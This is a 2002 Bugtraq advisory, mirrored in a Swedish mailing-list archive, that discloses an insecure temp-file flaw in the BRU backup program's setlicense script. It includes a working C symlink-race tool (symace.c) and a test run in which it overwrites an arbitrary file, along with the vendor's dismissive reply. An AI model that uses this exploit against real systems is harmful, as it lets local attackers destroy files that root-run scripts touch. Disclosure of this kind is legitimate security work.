linux, säkerhet

7899872 2002-01-26 21:00 +1100  /116 rader/ Andrew Griffiths <andrewg@tasmail.com>
Sänt av: joel@lysator.liu.se
Importerad: 2002-01-28  19:50  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <20701>
Ärende: bru backup program
------------------------------------------------------------
From: "Andrew Griffiths" <andrewg@tasmail.com>
To: bugtraq@securityfocus.com
Message-ID: <200201261000.g0QA0sT13634@franklin.nt.tas.gov.au>

Product: Bru 

Description:
------------

BRU provides fully verified backup and restore operations and offers
options  for most conceivable data backup and  recovery  needs.  BRU
is fully device  independent, so it works with any device or
filesystem that  is  supported by  your operating system.
Verification is performed automatically with BRU's  Autoscan feature
and can also be performed  days,  weeks, or even years after  a
backup is performed.

[ As taken from bru.1 man page ]

Problem:
--------

The usage of insecure tmp files in some of the various shell scripts,
which allows you to overwrite arbitrary files with foobar. Since this
script would most  likely be run by root, it allows you to overwrite
any files you want.

Exploit:
--------

This is the beginnings of the setlicense shell script. For those who
don't know, $$ is the current pid of the shell.

#!/bin/sh
printf "%s" foobar >/tmp/brutest.$$ 2>&1
res=`cat /tmp/brutest.$$`
rm -f /tmp/brutest.$$
if test "$res" != "foobar"; then
        alias printf="echo -n -e"
fi

So all that needs to be done is create a fair amount of symbolic
links in the temp directory pointing to the file you want to
overwrite.

---[ CUT ]---
/* symace.c -0.0.1 - A generic filesystem symlink/race thinger */

#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <stdio.h>

/* Please note that there is no error checking... */
/* By Andrew Griffiths (nullptr@tasmail.com)    */

int main(int argc, char **argv)
{
        char *overwrite;
        char *base;
        int start_pid, end_pid;
        int i, size;

        overwrite = strdup(argv[1]);
        size = strlen(argv[2]) + 8 + 1;
        base = malloc(size);
        start_pid=atoi(argv[3]);
        end_pid=atoi(argv[4]);

        for(i=start_pid;i<end_pid;i++) {
                memset(base, 0, size-1);
                snprintf(base, size-1, "%s%d", argv[2], i);
                if(symlink(overwrite, base)==-1) {
                        printf("Unable to create %s bailing\n", base);
                        exit(EXIT_FAILURE);
                }
        }
        printf("done\n");
}

Vendor Respone:
---------------

This doesn't make much sense to me, exploiting your own system while
you are already root? Correct me if I am wrong but this doesn't make
much sense to me.

--Mike
BRU Support Team 
The TOLIS Group - http://www.tolisgroup.com 
support@tolisgroup.com 

I think he didn't like my example down there. Everyone else on the
list should be able to understand it without the need for a # sign...


Test Run:
---------

[andrewg@blackhole src]$ echo hello world > /tmp/hello
[andrewg@blackhole src]$ ./symace /tmp/hello /tmp/brutest. 12037 13000
done

On another terminal:

[andrewg@blackhole x86-linux-glibc2.1]$ ./setlicense
./setlicense: cd: /bru: No such file or directory
/bru does not exist.  BRU may not be installed.

Then back to the other one...

[andrewg@blackhole src]$ cat /tmp/hello
foobar[andrewg@blackhole src]$




--
www.tasmail.com
(7899872) /Andrew Griffiths <andrewg@tasmail.com>/(Ombruten)